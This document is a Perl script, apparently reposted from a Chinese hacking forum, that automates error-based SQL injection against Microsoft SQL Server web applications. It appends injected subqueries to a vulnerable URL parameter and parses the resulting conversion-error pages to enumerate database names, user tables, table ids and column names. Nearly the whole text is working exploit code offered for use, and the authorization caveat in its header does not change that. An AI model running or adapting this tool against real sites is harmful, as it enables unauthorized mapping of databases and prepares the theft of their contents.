
MSSQL Database Scanner for SQL Injection

MSSQL Database Scanner for SQL Injection

来源:网络技术论坛

#!/usr/bin/perl

# Private exploit -- do not distribute. Error-based SQL injection enumerator: every probe is a
# request that deliberately raises a server-side conversion error, so it is noisy in the target's
# logs; run it only against systems you are explicitly authorized to test.

$|=1;
use Socket;
use Getopt::Std;
getopt('hpwtdi');


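# Command-line configuration.  Every option takes a value (getopt('hpwtdi')
# above declares them that way) and lands in the $opt_X package globals.
#   -h     target host name or IP.  Required: no default target is shipped.
#   -p     TCP port, 80 when omitted.
#   -w     a URL path on the target ending in the injectable numeric
#          parameter; the scans append their payloads to it verbatim.
#   -t     "table_scan" (default) or "column_scan".
#   -d/-i  database name and sysobjects id, used only by column_scan.
$host     = $opt_h;
$port     = $opt_p || 80;
$path     = $opt_w;
$type     = $opt_t || "table_scan";
$database = $opt_d;
$tab_id   = $opt_i;

usage();

# Refuse to run without an explicit target.  The original defaults pointed
# the tool at a hard-coded third-party site and URL, which is never what an
# operator wants and would otherwise fail later with a bare "inet_aton
# problems" message.
unless (defined $host && $host ne "" && defined $path && $path ne "") {
    print STDERR "\nError: both -h <host> and -w <URL path> are required.\n";
    exit 1;
}
unless ($port =~ /^\d+$/ && $port > 0 && $port < 65536) {
    print STDERR "\nError: -p must be a TCP port number (1-65535), got \"$port\".\n";
    exit 1;
}
unless ($type eq "table_scan" || $type eq "column_scan") {
    print STDERR "\nError: -t accepts only \"table_scan\" or \"column_scan\", got \"$type\".\n";
    exit 1;
}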


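# Dispatch on scan type.  Neither scan returns a value: table_scan fills the
# package globals @sqldb, @table_name and @table_id, column_scan fills
# @columns, and the results are printed here.
if ($type eq "table_scan") {
    scan_db();
    print "\nDatabase name scan complete!\n===================================\n";
    print "$_\n" for @sqldb;
    print "===================================\n";

    scan_table(@sqldb);

    # scan_table stores, per database, one "\n"-joined string of table names
    # and a parallel "\n"-joined string of their object ids (same order).
    # The original split on the letter "n" (split(/n/, ...)), which chopped
    # every name containing an "n"; the separator is a newline.
    for my $idx (0 .. $#sqldb) {
        print "\n\n==============   $sqldb[$idx]   ==============\n\n";
        my @names = split(/\n/, defined $table_name[$idx] ? $table_name[$idx] : "");
        my @ids   = split(/\n/, defined $table_id[$idx]   ? $table_id[$idx]   : "");
        for my $k (0 .. $#names) {
            my $id = defined $ids[$k] ? $ids[$k] : "?";
            print "| $names[$k]($id)\t";
        }
    }
    print "\n";
}
elsif ($type eq "column_scan") {
    # Both the database and the table id are interpolated into the probe,
    # so insist on them instead of silently doing nothing.
    unless (defined $database && $database ne "" && defined $tab_id && $tab_id ne "") {
        print STDERR "\ncolumn_scan needs both -d <database name> and -i <table id>\n";
        exit 1;
    }
    scan_columns($database, $tab_id);
    print "\n==============   $database.dbo.$tab_id   ==============\n\n";
    print "| $_\t" for @columns;
    print "\n";
}
else {
    print STDERR "\nUnknown scan type \"$type\"; use table_scan or column_scan\n";
    exit 1;
}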


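# Send one raw HTTP request to $host:$port over a fresh TCP connection and
# return every line of the response (status line, headers and body) as a list.
#
# $req - the complete request text, including the blank line that ends the
#        headers (see make_request).
#
# Dies -- the callers do not catch it -- when the host does not resolve, the
# socket cannot be created, or the connection is refused.  Plain TCP only:
# no TLS, no redirects, no timeout, and the whole response is read into
# memory.  Uses a lexical handle and sockaddr_in() instead of the original
# bareword handle and hand-packed address, and never leaves the socket as
# the selected output handle.
sub sendraw {
    my ($req) = @_;

    my $addr = inet_aton($host)
        or die("inet_aton problems\n");
    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        or die("Socket problems\n");
    connect($sock, sockaddr_in($port, $addr))
        or die("Can't connect...\n");

    # Autoflush the socket so the request actually leaves before we block on
    # the read; the select/select idiom sets $| on $sock and restores STDOUT.
    select((select($sock), $| = 1)[0]);
    print {$sock} $req;
    my @res = <$sock>;
    close($sock);

    return @res;
}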


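# dbid of the first database probed.  On SQL Server 2000 the low dbids are
# master, tempdb, model, msdb and the sample databases, so user databases
# typically start at 7; lower the constant if system databases are wanted.
use constant FIRST_USER_DBID => 7;
# sysdatabases.dbid is a smallint; never probe past its range, which also
# bounds the loop if every response happens to look like a hit.
use constant MAX_DBID => 32767;

# Enumerate database names from master.dbo.sysdatabases into the package
# global @sqldb, one request per dbid.
#
# Each probe forces a varchar->int conversion error whose message carries
# the database name (see findstr).  The walk stops at the first dbid that
# yields no name, so a gap left by a dropped database hides every database
# above it -- a known limitation of this enumeration method.
sub scan_db {
    my ($get, $req, @res);

    for (my $dbid = FIRST_USER_DBID; $dbid <= MAX_DBID; $dbid++) {
        $get = $path . "%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$dbid)";
        $req = make_request($get);
        @res = sendraw($req);
        my $db = findstr(@res);
        last if $db eq "not found";
        push @sqldb, $db;
    }
}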


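# Pull a single quoted value out of an MSSQL conversion-error page.
#
# The injected queries make the server convert a name (varchar) to int; the
# resulting Chinese-locale error message ("... varchar 值 'NAME' 转换 ...")
# quotes the offending value.  This scans the response lines for that message
# and returns the quoted value with leading/trailing whitespace trimmed, or
# the literal string "not found" when no line yields one.
#
# Caveats:
#   * Only Chinese error text is recognised; an English-locale server is
#     never matched and every scan reports "not found".
#   * The match is byte-based (no `use utf8`), so this file and the HTTP
#     response must share one encoding.
#   * A value containing a single quote is cut at that quote; only the part
#     before it is returned.
#   * Values of length 0 or 1 are skipped (the original threshold), so a
#     one-character name looks like "not found".
sub findstr {
    my @lines = @_;

    foreach my $line (@lines) {
        next unless $line =~ /char 值.*转换/is;

        # The message quotes the value with ASCII single quotes; take the
        # text between the first pair.
        my $val = (split(/'/, $line, 3))[1];
        next unless defined $val;

        # Trim the edges only.  The original deleted every space, which
        # merged names like "my table" into "mytable"; the mangled name then
        # never matched the NOT IN() exclusion list and the callers kept
        # re-fetching the same row forever.
        $val =~ s/^\s+//;
        $val =~ s/\s+$//;
        print ".";    # progress dot, one per recognised line
        return $val if length($val) > 1;
    }

    return "not found";
}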

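# Encode a name for use inside a quoted SQL literal that travels in the URL:
# double embedded single quotes (SQL quoting), then percent-encode every byte
# that is not URL-safe so spaces and non-ASCII bytes survive the request
# line.  The original interpolated names raw, so a name with a space broke
# the HTTP request and a name with a quote broke the query.
sub _sql_name_for_url {
    my ($name) = @_;
    (my $q = $name) =~ s/'/''/g;
    $q =~ s/([^A-Za-z0-9_.~-])/sprintf("%%%02X", ord($1))/ge;
    return $q;
}

# Fetch the next user-table name from $db_name.dbo.sysobjects that is not in
# $excluded (a ready-made SQL list such as "'a','b'", or "" for the first
# probe).  Returns the name, or "not found" (see findstr).
sub _next_table_name {
    my ($db_name, $excluded) = @_;
    my $filter = $excluded eq "" ? "" : "%20and%20name%20not%20in($excluded)";
    my $get = $path . "%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'$filter)";
    return findstr(sendraw(make_request($get)));
}

# Fetch the sysobjects id of the table whose SQL-literal form is $literal
# (already passed through _sql_name_for_url).  The probe forces str(id) into
# a conversion error so the id is echoed back.  Returns the id as a string,
# or "not found".
sub _table_id_of {
    my ($db_name, $literal) = @_;
    my $get = $path . "%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$literal'%20and%20uid>(str(id)))";
    return findstr(sendraw(make_request($get)));
}

# Enumerate the user tables (xtype='U') of every database in @db.
#
# Results go into the package globals, indexed by position in @db:
#   $table_name[$i]  "\n"-joined table names
#   $table_id[$i]    "\n"-joined object ids, parallel to $table_name[$i]
# A database with no tables leaves both entries undefined (the original
# stored the literal "not found" there and wasted a request looking up the
# id of that non-name).
#
# Database names are interpolated unquoted into "$db_name.dbo.sysobjects";
# names needing bracket quoting (spaces, punctuation) are not handled.
sub scan_table {
    my @db = @_;
    my $i = 0;

    foreach my $db_name (@db) {
        my %seen;           # names already enumerated for this database
        my $excluded = "";  # SQL list for the NOT IN() filter

        while (1) {
            my $table = _next_table_name($db_name, $excluded);
            last if $table eq "not found";
            # Seeing a name again means the exclusion filter did not take
            # (quoting/encoding mismatch); stop rather than loop forever.
            last if $seen{$table}++;

            my $literal = _sql_name_for_url($table);
            $excluded .= ($excluded eq "" ? "" : ",") . "'$literal'";

            $table_name[$i] .= "$table\n";
            $table_id[$i]   .= _table_id_of($db_name, $literal) . "\n";
        }
        print "\nDatabase \"$db_name\" scan complete!\n";
        $i++;
    }
}

# Enumerate the column names of one table into the package global @columns.
#
# $this_db_name   - database holding the table (interpolated unquoted).
# $this_table_id  - sysobjects id of the table, as printed by table_scan.
#
# Dies when the id is not an integer: it is interpolated straight into the
# probe, and a typo would otherwise turn into a broken query that merely
# reports no columns.
sub scan_columns {
    my ($this_db_name, $this_table_id) = @_;

    die("table id must be an integer, got \"" . (defined $this_table_id ? $this_table_id : "") . "\"\n")
        unless defined $this_table_id && $this_table_id =~ /^-?\d+$/;

    my %seen;
    my $excluded = "";
    while (1) {
        my $filter = $excluded eq "" ? "" : "%20and%20name%20not%20in($excluded)";
        my $get = $path . "%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id$filter)";
        my $column = findstr(sendraw(make_request($get)));
        last if $column eq "not found";
        # Same guard as scan_table: a repeated name means the filter failed.
        last if $seen{$column}++;

        push @columns, $column;
        $excluded .= ($excluded eq "" ? "" : ",") . "'" . _sql_name_for_url($column) . "'";
    }
}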

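# Build a minimal HTTP/1.0 GET for $getstr against the package global $host.
#
# $getstr - the request target (path plus query string).  The scans build it
#           with %20 for spaces, but a -w value typed with a literal space,
#           tab or newline would produce a malformed request line (or split
#           it into extra headers), so control bytes and spaces are
#           percent-encoded here.  Other bytes are passed through unchanged.
#
# Returns the request text including the blank line that ends the headers.
# The Host header is emitted as "HOST:<host>" exactly as before: header names
# are case-insensitive and the space after the colon is optional.
sub make_request {
    my $getstr = shift;
    (my $target = $getstr) =~ s/([\x00-\x20\x7f])/sprintf("%%%02X", ord($1))/ge;
    return "GET $target HTTP/1.0\r\n" . "HOST:$host\r\n\r\n";
}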

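# Print the banner and command-line help to STDOUT.  Called unconditionally
# at start-up, so it doubles as the banner; $0 is the script name as invoked.
#
# The contact address is written "envymask\@ph4nt0m.net": inside qq~...~ a
# bare "@ph4nt0m" interpolates the (empty) array @ph4nt0m and the original
# printed "envymask.net".  The forum markup ([url], [email], <a href>) that
# had leaked into the example lines is removed.
sub usage {
    print qq~

        ===================================================
          MSSQL Database Scanner for SQL Injection
            Codz By Envymask<envymask\@ph4nt0m.net>
        ===================================================

Usage: $0 -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database name> -i <table id>]
  -h   =hostname you want to scan
  -p   =port,80 default
  -w   =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
  -t   =scan type ,only accept "table_scan" and "column_scan"
  -d   =the database name you want to scan such as "movie",only selected "column_scan" can use this option
  -i   =the table id you want to scan such as "1568724641",you can get this id from table_scan,only selected "column_scan" can use this option
Eg: $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
  $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641

~;
}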
